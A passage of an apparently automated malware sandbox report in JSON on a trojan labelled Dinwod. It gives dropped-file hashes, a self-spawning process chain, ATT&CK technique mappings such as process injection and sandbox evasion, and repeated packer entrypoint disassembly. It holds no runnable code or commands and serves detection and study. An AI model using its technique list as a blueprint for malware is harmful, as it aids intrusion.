"fb949c432b103dd148d540e3b2fe5329fff0dec2f1be0e4a5635d3eb23e05de0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bnhphvh.exe", "file_size": 343171, "sha256": "37da6ac0a777d1e814a4b5d87d7475100de6d6674280f7b75423234e2a1e6d3c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "64462.exe", "file_size": 343151, "sha256": "15a34c931892b019fbda3ee9d587788ca36470067ef81bdead7ddc1fa9ffcb51", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tddht.exe", "file_size": 343139, "sha256": "7d8a93cfca987b2a073e652ddea174b5eb7b81ecec67a9900c97167233ed9ea2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hfnrrt.exe", "file_size": 343123, "sha256": "0511cf6b48aeaa6c17ef8f6867085b63507da779cf6d72c50f70bf8ef0583d57", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "drtpjh.exe", "file_size": 343111, "sha256": "0e610837858798e3139219a6b1f97248f8ebd53700c02b187bab047b56e92e02", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "482486.exe", "file_size": 343094, "sha256": "d9c12ca5cf9795b18b0744ce4ca9a868628fb05bb07c91c60f9afe997a4c070a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0484408.exe", "file_size": 343078, "sha256": "d5fdbf0ba7ee2a45339f7e5f9c05cbd735054fd572cbdee335f793f498e00294", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2226066.exe", "file_size": 343061, "sha256": "ac74455cad7c61994e6c7eed05863193ecd3274eaeb65f8f9e2a2bb1b7e28ac2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "60440.exe", "file_size": 343048, "sha256": "ef47b1af937371b0fef837e04678b541703048edb83a7f4d34ea75846b9e1d77", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00006096", "name": "511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe", "normalized_path": "C:\\511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe", "sha256": "511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e", "av_label": "Trojan.Dinwod", "av_matched": 17, "av_total": 22}, {"uid": "00000000-00006136", "parentuid": "00000000-00006096", "name": "vftrx.exe", "normalized_path": "c:\\vftrx.exe", "sha256": "a4af1f09f8766de27fe8e23ed94c91d40107c1268bf648d20437d31710b4b385"}, {"uid": "00000000-00005952", "parentuid": "00000000-00006136", "name": "06626.exe", "normalized_path": "c:\\06626.exe", "sha256": "59c1694b096767dc0aee86454918fe48614140702cf870036917dde039e5cf05"}, {"uid": "00000000-00005924", "parentuid": "00000000-00005952", "name": "28482.exe", "normalized_path": "c:\\28482.exe", "sha256": "04c6610e39b32e4400b70736975861cf057199882ea5f71a019a44080a775fdc"}, {"uid": "00000000-00004428", "parentuid": "00000000-00005924", "name": "0260006.exe", "normalized_path": "c:\\0260006.exe", "sha256": "ea1285beb4f0f2c94d454489dd2ae986d4ef2543f056c047ec6d2aab90c4de58"}, {"uid": "00000000-00005656", "parentuid": "00000000-00004428", "name": "44628.exe", "normalized_path": "c:\\44628.exe", "sha256": "c9f5e3b8a2b3b1c01a6b6313936fa037f935d58609320e5fe0a62289964e11dc"}, {"uid": "00000000-00000864", "parentuid": "00000000-00005656", "name": "xlrdpdb.exe", "normalized_path": "c:\\xlrdpdb.exe", "sha256": "00014e7b1dd32840dd45dabcb4cd8759726d6f002fe9177dd40dbf12fcd83796"}, {"uid": "00000000-00004064", "parentuid": "00000000-00000864", "name": "lnxndll.exe", "normalized_path": "c:\\lnxndll.exe", "sha256": "ced53ef82f3abf82aa6960c6f69a77a9714842b8e301d7b754eea5f2ce9da4b2"}, {"uid": "00000000-00004168", "parentuid": "00000000-00004064", "name": "8028040.exe", "normalized_path": "c:\\8028040.exe", "sha256": "ac7c9c20730638e9f8d9fc58d7153cf0371a1a1ec7ae57f365aecae8c029db57"}, {"uid": "00000000-00006080", "parentuid": "00000000-00004168", "name": "ndfntv.exe", "normalized_path": "c:\\ndfntv.exe", "sha256": "c6b6e5199002043619c869b966457a8e850e893e4a9a93b673e0a5b07dcf83e4"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hnldj.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"txvhpv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"800884.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"800608.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"082060.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"22802.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"2224020.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"8886462.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dhpnj.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"bnhphvh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"64462.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"tddht.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hfnrrt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"drtpjh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"482486.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"0484408.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"2226066.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"60440.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"2822060.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"46000.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"644802.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"288022.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"446022.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"fdrnfdr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hnldj.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"txvhpv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"800884.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"800608.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"082060.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"22802.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"2224020.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"8886462.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"dhpnj.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"bnhphvh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"64462.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"tddht.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hfnrrt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"drtpjh.exe\" file has an entrypoint instructions - 